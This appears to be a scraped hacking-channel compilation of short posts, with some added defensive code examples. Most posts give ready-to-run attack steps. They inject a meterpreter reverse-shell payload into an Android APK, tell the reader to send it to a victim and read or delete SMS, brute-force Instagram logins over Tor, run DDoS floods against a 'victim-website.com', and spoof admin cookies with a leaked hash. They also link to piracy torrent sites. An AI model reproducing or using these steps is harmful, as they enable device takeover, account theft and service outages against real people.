β β β Uππ»βΊπ«Δπ¬πβ β β β
Sniffer may cause harm:
1) The sniffer can capture passwords.
2) It can capture private or confidential information.
3) It can be used to compromise the security of network neighbors, or to obtain higher-level access rights.
> In fact, if there is an unauthorized sniffer on the network, you should assume your system has been exposed to others. (You can try the sniffing function of Skyline 2)
4) Generally, a sniffer captures only the first 200 to 300 bytes of each message. The username and password are included in this part, which is the part that really matters. A sniffer can also capture all the packets on a given interface; with enough storage space and processing capacity, other very interesting things will turn up...
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
HACK INSTAGRAM WITH LINUX OS :
INSTALLATION & RUN :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
2) chmod -R 755 Instagram && cd Instagram
3) python instagram.py
4) get any wordlist, for example:
> https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
> http://www.insidepro.team/
> https://wiki.skullsecurity.org/Passwords
> https://github.com/danielmiessler/SecLists/tree/master/Passwords
> https://github.com/berzerk0/Probable-Wordlists
> https://github.com/topics/password-cracking
(up to 12 Gb wordlists)
5) install Tor with: sudo apt-get install tor
6) python instagram.py Username wordlist.txt
E N J O Y
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
HACK WHATSAPP VIA LINUX-PARROT/KALI/UBUNTU :
A ) Install requirements :
1) apt-get install lib32stdc++6 lib32ncurses5 lib32z1
2) git clone https://github.com/SkullTech/apk-payload-injector
INSTALLATION & RUN :
3) choose the APK PAYLOAD - recommended any cleaner apk
4) make sure to place both of the apk and the script you downloaded earlier in the same directory
5)type in terminal :
> ruby apk-embed-payload.rb cleanerapk.apk -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx
6)now type :
> msfconsole
7) type in terminal :
> use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST {local ip to listen on}
set LPORT {the port you set earlier}
exploit
8) now send the apk to the victim :))
9) after installing, use the command drop_sms
10) recommended :
root the phone and simply spoof the MAC address using a terminal, download from playstore like termux
11) to delete the android sms db use this command :
> delete data/data/com.android.providers.telephony/databases/mmssms.db
E N J O Y
written by @medusaU
β β β Uππ»βΊπ«Δπ¬πβ β β β
TOP TWITTER HACKING 2020 :
windows-linux
INSTALLATION & RUN :
1) sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl
2) sudo pip install --upgrade pip
3) sudo pip install --upgrade virtualenv
4) sudo pip install --upgrade tweepy
5) sudo pip install --upgrade pillow
6) sudo pip install --upgrade exifread
7) sudo pip install --upgrade jinja2
8) sudo pip install --upgrade oauth2
9) download or clone https://github.com/vaguileradiaz/tinfoleak
10) Edit "tinfoleak.conf"
11) Use your favorite editor ;-)
12) Give value to these variables:
CONSUMER_KEY
CONSUMER_SECRET
ACCESS_TOKEN
ACCESS_TOKEN_SECRET
13) How to obtain these values:
https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens
Save "tinfoleak.conf"
Execute "tinfoleak.py"
E N J O Y
U S E F O R L E A R N
β β β Uππ»βΊπ«Δπ¬πβ β β β
HTTP-FLOOD TOPIC (TERMUX/LINUX)
Wreckuests is a script which allows you to run DDoS attacks with HTTP flood (GET/POST). It's written in pure Python and uses proxy servers as "bots". OF COURSE, this script is not universal and you can't just drop Pentagon/NSA/whatever website with just a single mouse click. Each attack is unique, and for each website you'd need to search for vulnerabilities and exploit them.
F E A T U R E S :
-Cache bypass with URL parameters randomization
-CloudFlare detection and notification of
-Automatic gzip/deflate toggling
-HTTP Authentication bypass
-UserAgent substitution
-Referers randomizer
-HTTP proxy support
INSTALLATION & RUN :
1) https://github.com/JamesJGoodwin/wreckuests.GIT
2) chmod +x install.sh
3) ./install.sh
REQUIRE ROOT FOR TERMUX USERS
4) python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>
E N J O Y
U S E F O R L E A R N
@UndercodeTesting
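A defender's view of the features listed above, as an added example (not part of the original post or of the Wreckuests project): it scans web access-log lines and flags a path that, within one minute, receives many requests whose query strings, User-Agents and Referers are almost all unique, which is the footprint left by cache-busting parameter randomization and header rotation. The log lines, the combined log format and the thresholds are constructed assumptions.

```javascript
// Added example: spot cache-busting HTTP-flood traffic in a web access log.
// Assumed input: "combined" log format lines; thresholds are illustrative.
const LOG_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = LOG_RE.exec(line.trim());
  if (!m) return null; // malformed line: skip it instead of failing the scan
  const [, ip, ts, method, target, status, referer, userAgent] = m;
  const q = target.indexOf("?");
  return {
    ip,
    minute: ts.slice(0, 17), // "10/Aug/2020:12:00" -> one bucket per minute
    method,
    path: q === -1 ? target : target.slice(0, q),
    query: q === -1 ? "" : target.slice(q + 1),
    status: Number(status),
    referer,
    userAgent,
  };
}

function detectFlood(lines, { minRequests = 20, minUniqueRatio = 0.9 } = {}) {
  // Group requests per (minute, path); the source IP is not the key because
  // the traffic described above arrives through many proxies.
  const buckets = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const key = `${rec.minute} ${rec.path}`;
    if (!buckets.has(key)) {
      buckets.set(key, {
        minute: rec.minute, path: rec.path, total: 0,
        queries: new Set(), agents: new Set(), referers: new Set(), ips: new Set(),
      });
    }
    const b = buckets.get(key);
    b.total += 1;
    b.queries.add(rec.query);
    b.agents.add(rec.userAgent);
    b.referers.add(rec.referer);
    b.ips.add(rec.ip);
  }

  const findings = [];
  for (const b of buckets.values()) {
    if (b.total < minRequests) continue; // too little traffic to judge
    const signals = [];
    // Ordinary visitors reuse a handful of query strings, browsers and referers;
    // near-100% uniqueness on a busy path is the anomaly.
    if (b.queries.size / b.total >= minUniqueRatio) signals.push("randomized-query");
    if (b.agents.size / b.total >= minUniqueRatio) signals.push("rotating-user-agent");
    if (b.referers.size / b.total >= minUniqueRatio) signals.push("randomized-referer");
    if (signals.length >= 2) {
      findings.push({
        minute: b.minute, path: b.path, requests: b.total,
        sourceIps: b.ips.size, signals,
      });
    }
  }
  return findings;
}

// Constructed sample: 30 flood-like requests and 30 ordinary ones in one minute.
function buildSampleLog() {
  const pad = (n) => String(n).padStart(2, "0");
  const lines = [];
  for (let i = 0; i < 30; i++) {
    const ts = `10/Aug/2020:12:00:${pad(i)} +0000`;
    lines.push(
      `198.51.100.${(i % 5) + 1} - - [${ts}] "GET /index.php?k${i * 7919}=${i * 104729} HTTP/1.1" ` +
      `200 512 "http://ref${i}.example/" "Mozilla/5.0 (constructed-agent-${i})"`
    );
    lines.push(
      `203.0.113.${i + 1} - - [${ts}] "GET /products?page=${(i % 3) + 1} HTTP/1.1" ` +
      `200 2048 "https://shop.example/" "Mozilla/5.0 (browser-${i % 4})"`
    );
  }
  lines.push("not a log line"); // malformed input must be tolerated
  return lines;
}

console.log(detectFlood(buildSampleLog()));
```

A finding is a reason to rate-limit or challenge requests to that path, since the randomized query string is what defeats the cache in front of it.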
β β β Uππ»βΊπ«Δπ¬πβ β β β
updated 2020 node.js module for getting and setting HTTP(S) cookies
> Cookies can be signed to prevent tampering, using Keygrip. The module can be used with the built-in node.js HTTP library, or as Connect/Express middleware.
INSTALLATION & RUN :
1) Open any Debian-based terminal and type:
> npm install
2) $ npm install cookies
3) express.createServer( Cookies.express( keys ) )
> This adds cookie support as a Connect middleware layer for use in Express apps, allowing inbound cookies to be read using req.cookies.get and outbound cookies to be set using res.cookies.set.
4) full usage on: https://github.com/pillarjs/cookies
F E A T U R E S :
1) Lazy: Since cookie verification against multiple keys could be expensive, cookies are only verified lazily when accessed, not eagerly on each request.
2) Secure: All cookies are httponly by default, and cookies sent over SSL are secure by default. An error will be thrown if you try to send secure cookies over an insecure socket.
3) Unobtrusive: Signed cookies are stored the same way as unsigned cookies, instead of in an obfuscated signing format. An additional signature cookie is stored for each signed cookie, using a standard naming convention (cookie-name.sig). This allows other libraries to access the original cookies without having to know the signing mechanism.
4) Agnostic: This library is optimized for use with Keygrip, but does not require it; you can implement your own signing scheme instead if you like and use this library only to read/write cookies. Factoring the signing into a separate library encourages code reuse and allows you to use the same signing library for other areas where signing is needed, such as in URLs.
E N J O Y
U S E F O R L E A R N
@UndercodeTesting
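How the separate cookie-name.sig cookie catches tampering, as an added example (a simplified re-implementation for illustration, not the code of the cookies or Keygrip libraries): the value is signed with the newest key, verified only when read, and checked against every key in the ring so that cookies signed before a key rotation still verify and get re-signed. The key strings, the cookie name, the Map used as a cookie jar and the choice of HMAC-SHA256 are assumptions.

```javascript
// Added example: Keygrip-style signed cookies, reduced to the core idea.
const nodeCrypto = require("node:crypto");

// HMAC over "name=value", encoded as URL-safe base64 so it fits a cookie value.
function sign(data, key) {
  return nodeCrypto.createHmac("sha256", key).update(data).digest("base64")
    .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}

// Index of the key that produced `digest`, or -1 if no key in the ring matches.
// timingSafeEqual avoids leaking how many leading characters were correct.
function keyIndex(data, digest, keys) {
  const given = Buffer.from(String(digest));
  for (let i = 0; i < keys.length; i++) {
    const expected = Buffer.from(sign(data, keys[i]));
    if (expected.length === given.length &&
        nodeCrypto.timingSafeEqual(expected, given)) {
      return i;
    }
  }
  return -1;
}

// Outbound: the value stays readable, the signature travels in "<name>.sig".
function setSigned(jar, name, value, keys) {
  jar.set(name, value);
  jar.set(`${name}.sig`, sign(`${name}=${value}`, keys[0]));
}

// Inbound: verification happens here, lazily, when the cookie is accessed.
function getSigned(jar, name, keys) {
  if (!jar.has(name)) return { status: "missing", value: undefined };
  const value = jar.get(name);
  const idx = keyIndex(`${name}=${value}`, jar.get(`${name}.sig`) ?? "", keys);
  if (idx < 0) return { status: "rejected", value: undefined };
  // Signed with an older key: accept, and refresh the signature with the newest.
  if (idx > 0) jar.set(`${name}.sig`, sign(`${name}=${value}`, keys[0]));
  return { status: idx === 0 ? "ok" : "re-signed", value };
}

// Walk through rotation, tampering and a stripped signature with constructed keys.
function demo() {
  const oldRing = ["constructed-key-2019"];
  const newRing = ["constructed-key-2020", "constructed-key-2019"];
  const jar = new Map(); // stands in for the browser's cookie store
  const results = {};

  setSigned(jar, "role", "user", oldRing);
  results.afterRotation = getSigned(jar, "role", newRing).status;
  results.secondRead = getSigned(jar, "role", newRing).status;

  jar.set("role", "admin"); // client edits the value but cannot recompute the HMAC
  results.tampered = getSigned(jar, "role", newRing).status;

  jar.delete("role.sig"); // client drops the signature cookie altogether
  results.noSignature = getSigned(jar, "role", newRing).status;

  setSigned(jar, "role", "user", oldRing);
  results.retiredKey = getSigned(jar, "role", ["constructed-key-2021"]).status;
  return results;
}

console.log(demo());
```

Signing protects integrity only: the value is still readable by the client, so secrets do not belong in it.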
β β β Uππ»βΊπ«Δπ¬πβ β β β
Qualcomm confirms that Snapdragon DSP flaws can expose 40% of smartphones to hackers :
#news
> Qualcomm has confirmed that a huge flaw has been found in its smartphone chipsets, leaving phones completely exposed to hackers. The vulnerability was discovered by the security company Check Point. A large number of flaws in the Snapdragon DSP in Android phones can allow hackers to steal data, install hidden spyware that is difficult to find, and even completely damage the phone and make it unusable.
> Check Point publicly disclosed this flaw on Pwn2Own, revealing that the security settings of the DSP built into Qualcomm Snapdragon phones were easily bypassed, and 400 exploitable flaws were found in the code.
> For security reasons, programming the cDSP is licensed only to OEM manufacturers and a limited number of third-party software vendors. The code running on the DSP is signed by Qualcomm. The security company successfully demonstrated how Android applications can bypass Qualcomm's signature and execute privileged code on the DSP, and what further security issues this will cause.
> Hexagon SDK is the official way for manufacturers to prepare DSP-related code. The SDK has serious bugs, which lead to hundreds of hidden vulnerabilities in Qualcomm's own code and in manufacturers' code. In fact, almost all DSP executable libraries embedded in Qualcomm-based smartphones are open to attack due to problems with the Hexagon SDK, and the resulting vulnerabilities can be exploited by hackers.
#news
β β β Uππ»βΊπ«Δπ¬πβ β β β
FASTEST DDOS FOR TERMUX -2020
INSTALLATION & RUN :
1) Open Terminal in Kali Linux or Termux in Android
2) mkdir ddos
3) cd ddos
4) pkg install python2
5) pkg install git
6) git clone https://github.com/jseidl/GoldenEye.git
7) cd GoldenEye/
8) ./goldeneye.py victim-website.com
9) python2 ./goldeneye.py victim-website.com
10) Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
USE FOR LEARN
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
What is Sniffing & how many categories :
> What a sniffer cares about can be divided into the following categories:
1) Password
I think this is the reason for most illegal use of sniffers: a sniffer can record the userid and passwd transmitted in plain text. Even if you encrypt data in transit, the data recorded by a sniffer may let the intruder try to figure out your algorithm while eating skewers at home.
2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and PIN sent online.
3) Peeping at confidential or sensitive information and data
By intercepting data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept an entire email conversation.
4) Spying on low-level protocol information
This is a terrible thing, I think: recording low-level protocol information, such as the network interface address between two hosts, the remote network interface IP address, IP routing information, and the byte sequence number of the TCP connection.
5) This information poses a great harm to network security once it is in the hands of illegal intruders. Usually someone uses a sniffer to collect this information for only one reason: he is carrying out spoofing (IP address spoofing usually requires accurately inserting the TCP connection's byte sequence number, which will be pointed out in a later article). If someone is very interested in this information, then the sniffer is just a prelude for him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffer attacks.)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Crack mysql root password :
Windows:
1) Log in to the system as the system administrator.
2) Stop the MySQL service.
3) Open a command window and change to the MySQL bin directory; for example, if the installation directory is c:\mysql, enter c:\mysql\bin
4) Start MySQL with the permission check skipped:
c:\mysql\bin>mysqld-nt --skip-grant-tables
5) Open another window, enter the c:\mysql\bin directory, and set the new root password:
c:\mysql\bin>mysqladmin -u root flush-privileges password "newpassword"
c:\mysql\bin>mysqladmin -u root -p shutdown
6) Replace newpassword with the root password you want to use. The second command will prompt you to enter the new password. Repeat the password entered in the first command.
7) Stop MySQL Server and start MySQL in normal mode.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hack email accounts or passwords using session cookie :
INSTALLATION & RUN :
A) UNDERSTANDING :
1) Cookie spoofing means obtaining a user's login permission by modifying the content of Cookies, in a system that authenticates users with Cookies alone.
So what are Cookies?
<> Let me give you a professional explanation. A cookie is a text file stored in the browser directory, which records information about your visit to a specific site, and can only be read back by the site that created the Cookie. It consists of 255 characters and only occupies 4KB of hard disk space. When the user is browsing a certain site, it is stored in the random access memory (RAM) of the user's machine, and after exiting the browser, it is stored on the user's hard disk. Most of the information stored in Cookies is common
Second, principle analysis
B ) A T T A C K :
Let's first take a look at how 6kbbs is done. In login.asp we find 113-124 lines, look here : ))
if login=false then
  tl=" login failed"
  mes=mes&"·Return to fill in"
else
  ' Login succeeded: lgname, lgpwd, lgtype and lgcook are written to client-side cookies
  Response.Cookies(prefix)("lgname")=lgname
  session(prefix&"lgname")=lgname
  Response.Cookies(prefix)("lgpwd")=lgpwd
  Response.Cookies(prefix)("lgtype")=lgtype
  Response.Cookies(prefix)("lgcook")=cook
  ' A chosen lifetime (cook > 0) becomes the cookie expiry date
  if cook>0 then
    Response.Cookies(prefix).Expires=date+cook
  end if
end if
3) Let me explain what this passage means. If you fail to log in, it shows "login failed" and leads you back to the previous page; otherwise the login details are written into Cookies for you. If you chose to keep the Cookies, their expiration time is set to the time you asked for the cookies to be saved.
4) now I take 6kbbs as an example, and assume that you have already obtained the website database or the administrator's MD5 encrypted password. How to get it, go to the search engine to search for the keyword "powered by 6kbbs", and then you will see a lot of 6kbbs websites.
5) Open IECookiesView, this software is used to view and modify the cookies of this machine, which is very convenient for our cookies to deceive and invade.
N O T E S :
<> The spoofing in this undercode tutorial can only obtain front-end administrator authority; the back-end requires entering a password and uses Session authentication, not Cookies, so it cannot be spoofed.
<> Cookie spoofing exists in a large number of current programs that do not do Session verification. So, if you get the database or administrator encryption password, you might as well try Cookies spoofing, it will have unexpected effects.
E N J O Y
@UndercodeTesting
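Why the cookie scheme described above fails once a password hash leaks, and what Session verification changes, as an added example (not 6kbbs code; the user record, password, salt and function names are constructed): the first check trusts the lgname/lgpwd cookies, so the stored hash is as good as the password, while the second accepts only an unguessable session ID that the server issued after a real login and can expire or revoke.

```javascript
// Added example: cookie-only authentication beside server-side sessions.
const nodeCrypto = require("node:crypto");

const md5 = (s) => nodeCrypto.createHash("md5").update(s).digest("hex");
const slowHash = (pw, salt) => nodeCrypto.scryptSync(pw, salt, 32);

// Constructed user table. legacyMd5 models the old forum's stored value;
// salt + pwHash model salted, slow password storage for the hardened path.
const SALT = Buffer.from("constructed-salt");
const users = new Map([["admin", {
  type: "admin",
  legacyMd5: md5("constructed-password"),
  salt: SALT,
  pwHash: slowHash("constructed-password", SALT),
}]]);

// Legacy pattern: whoever presents name + stored hash in cookies is logged in.
// The hash never changes, never expires and cannot be revoked per login.
function legacyCookieAuth(cookies) {
  const u = users.get(cookies.lgname);
  return u && cookies.lgpwd === u.legacyMd5
    ? { user: cookies.lgname, type: u.type }
    : null;
}

// Hardened pattern: the cookie carries only a random ID; identity lives server-side.
const sessions = new Map(); // sid -> { user, type, expires }
const SESSION_TTL_MS = 30 * 60 * 1000;

function login(name, password, now = Date.now()) {
  const u = users.get(name);
  if (!u) return null;
  if (!nodeCrypto.timingSafeEqual(slowHash(password, u.salt), u.pwHash)) return null;
  const sid = nodeCrypto.randomBytes(32).toString("hex"); // 256 bits, unguessable
  sessions.set(sid, { user: name, type: u.type, expires: now + SESSION_TTL_MS });
  return sid; // would be sent as an HttpOnly, Secure cookie
}

function sessionAuth(cookies, now = Date.now()) {
  const s = sessions.get(cookies.sid);
  if (!s) return null; // unknown ID: nothing the client sends can create one
  if (now >= s.expires) {
    sessions.delete(cookies.sid);
    return null;
  }
  return { user: s.user, type: s.type };
}

function logout(cookies) {
  return sessions.delete(cookies.sid); // revocation is a server-side delete
}

// Compare both checks against a cookie built from a leaked hash (constructed).
function demo() {
  const leakedHash = users.get("admin").legacyMd5; // stands in for a leaked DB value
  const forged = { lgname: "admin", lgpwd: leakedHash, lgtype: "admin" };
  const sid = login("admin", "constructed-password", 0);
  return {
    legacyAcceptsForged: legacyCookieAuth(forged) !== null,
    sessionAcceptsForged: sessionAuth(forged, 1) !== null,
    sessionAcceptsGuess: sessionAuth({ sid: "0".repeat(64) }, 1) !== null,
    hashWorksAsPassword: login("admin", leakedHash, 0) !== null,
    sessionAcceptsIssued: sessionAuth({ sid }, 1) !== null,
    acceptedAfterExpiry: sessionAuth({ sid }, SESSION_TTL_MS) !== null,
  };
}

console.log(demo());
```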
β β β Uππ»βΊπ«Δπ¬πβ β β β
2020 apps FOR SHOWING WIFI SAVED PASSWORD :
Download it from https://play.google.com/store/apps/details?id=com.doionline.wifipasswordrecovery&hl=en_US
Download it from https://wifi-password-root.en.uptodown.com/android
Download it from https://play.google.com/store/apps/details?id=com.sbacham.srinu.showwifipassword2017&hl=en_US
Download it from https://play.google.com/store/apps/details?id=com.matic.showwifipassword&hl=en
for windows :
https://wifi-password-revealer.en.uptodown.com/windows
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST TORRENT SITES FOR MOVIES :
> https://thepiratebay10.org
> https://rarbg.to/index70.php
> https://1337x.to/
> https://torrentz2.eu/ (sometimes down)
> http://www.yts.am/
> https://eztv.io/
> https://zooqle.com/
> https://torrentdownloads.mrunblock.xyz/
> https://www.limetorrents.info/
N O T E :
you can't download without a torrent client app ;)
E N J O Y
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
A powerful and useful hacker dictionary builder for a brute-force attack
INSTALLATION & RUN :
1) git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git
2) cd pydictor/
3) chmod +x pydictor.py
4) python pydictor.py
5) choose options as shown in picture :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
#News
Threatpost reported that Chromium-based browsers were found to have a vulnerability that allows the Content Security Policy (CSP) to be bypassed, leaving billions of users exposed to attackers who could steal data and execute malicious code. PerimeterX network security researcher Gal Weizman pointed out that the vulnerability (CVE-2020-6519) can be found in Chrome browsers for Windows, Mac and Android, as well as Opera and Edge.
> As a Web standard, the Content Security Policy (CSP) is designed to prevent certain types of attacks, such as cross-site scripting (XSS) and data injection.
CSP allows web administrators to specify the valid sources from which browsers may execute scripts, so that browsers compatible with the standard only load and execute scripts from trusted sources.
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑With Django Hijack, admins can log in and work on behalf of other users without having to know their credentials
INSTALLATION & RUN:
1) Get the latest stable release from PyPI:
pip install django-hijack
2) In your settings.py, add hijack and its dependency compat to your installed apps:
INSTALLED_APPS = (
    ...,
    'hijack',
    'compat',
)
3) Finally, add the Django Hijack URLs to urls.py:
from django.conf.urls import include, url
urlpatterns = [
    ...
    url(r'^hijack/', include('hijack.urls', namespace='hijack')),
]
4) After installing, set up the redirections
> You should specify a HIJACK_LOGIN_REDIRECT_URL and a HIJACK_LOGOUT_REDIRECT_URL. This is where admins are redirected to after hijacking or releasing a user. Both settings default to LOGIN_REDIRECT_URL.
# settings.py
HIJACK_LOGIN_REDIRECT_URL = '/profile/'  # Where admins are redirected to after hijacking a user
HIJACK_LOGOUT_REDIRECT_URL = '/admin/auth/user/'  # Where admins are redirected to after releasing a user
5) Setting up the notification bar
We strongly recommend displaying a notification bar to everyone who is hijacking another user. This reduces the risk of an admin hijacking someone inadvertently or forgetting to release the user afterwards.
6) To set up the notification bar, add the following lines to your base.html or to another template in which you want the notification bar to be displayed.
<!-- At the top -->
{% load staticfiles %}
{% load hijack_tags %}
...
<!-- In the head -->
<link rel="stylesheet" type="text/css" href="{% static 'hijack/hijack-styles.css' %}" />
...
<!-- Directly after <body> -->
{% hijack_notification %}
...
7) If your project uses Bootstrap you may want to set HIJACK_USE_BOOTSTRAP = True in your project settings. Django Hijack will display a Bootstrap notification bar that does not overlap with the default navbar.
8) Generic template filter
We also provide a generic template filter to check if you are currently hijacking a user. This is useful for displaying/hiding elements besides the notification bar.
{% load hijack_tags %}
{% if request|is_hijacked %}
...
{% endif %}
9) The following URLs are available by default:
/hijack/<user id>
/hijack/username/<username>
/hijack/email/<user email>
10) If the hijacking is successful, the user is redirected to the HIJACK_LOGIN_REDIRECT_URL, and the yellow notification bar is displayed at the top of the landing page.
Here is a reference implementation of a button that allows a superuser to hijack the user referenced by the context variable user:
<form action="/hijack/{{ user.id }}/" method="post">
{% csrf_token %}
<button type="submit">Hijack {{ user.username }}</button>
</form>
More on: https://django-hijack.readthedocs.io/en/stable/
E N J O Y ❤️👍🏻
U S E F O R L E A R N
@UndercodeTesting
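Because every impersonation goes through one of the three default URLs listed in step 9, those requests can be audited from the web server's access log. The following is an added example, not code from the post or from the django-hijack project: it assumes combined-format access logs and the /hijack/ mount point from step 3, and the log lines, function names and flag labels are constructed for illustration.

```python
import re

# Constructed access-log lines (combined log format); every value is a sample.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2020:10:01:02 +0000] "POST /hijack/42/ HTTP/1.1" 302 0
203.0.113.7 - - [12/Aug/2020:10:05:40 +0000] "POST /hijack/username/bob/ HTTP/1.1" 302 0
198.51.100.9 - - [12/Aug/2020:10:07:11 +0000] "GET /hijack/email/carol@example.com/ HTTP/1.1" 403 0
198.51.100.9 - - [12/Aug/2020:10:07:15 +0000] "GET /profile/ HTTP/1.1" 200 512
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# The three default routes from step 9, mounted under /hijack/ as in step 3.
ROUTE = re.compile(
    r'^/hijack/(?:(?P<id>\d+)|username/(?P<username>[^/]+)|email/(?P<email>[^/]+))/?$')

def hijack_events(log_text):
    """Return one record per request that targets a hijack URL."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # not a parseable access-log line
        route = ROUTE.match(m["path"].split("?")[0])
        if not route:
            continue                      # some other URL
        kind, value = next((k, v) for k, v in route.groupdict().items() if v)
        flags = []
        if m["method"] != "POST":         # the reference button submits a POST form
            flags.append("non-POST")
        if m["status"] in ("401", "403"):
            flags.append("denied")
        events.append({"ip": m["ip"], "time": m["ts"], "target": (kind, value),
                       "status": int(m["status"]), "flags": flags})
    return events

def needs_review(events):
    """Events an administrator should look at first."""
    return [e for e in events if e["flags"]]

if __name__ == "__main__":
    for event in hijack_events(SAMPLE_LOG):
        print(event)
```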
β β β Uππ»βΊπ«Δπ¬πβ β β β
django-hijack.readthedocs.io
Django Hijack
Django Hijack allows superusers to hijack (=login as) and work on behalf of another user.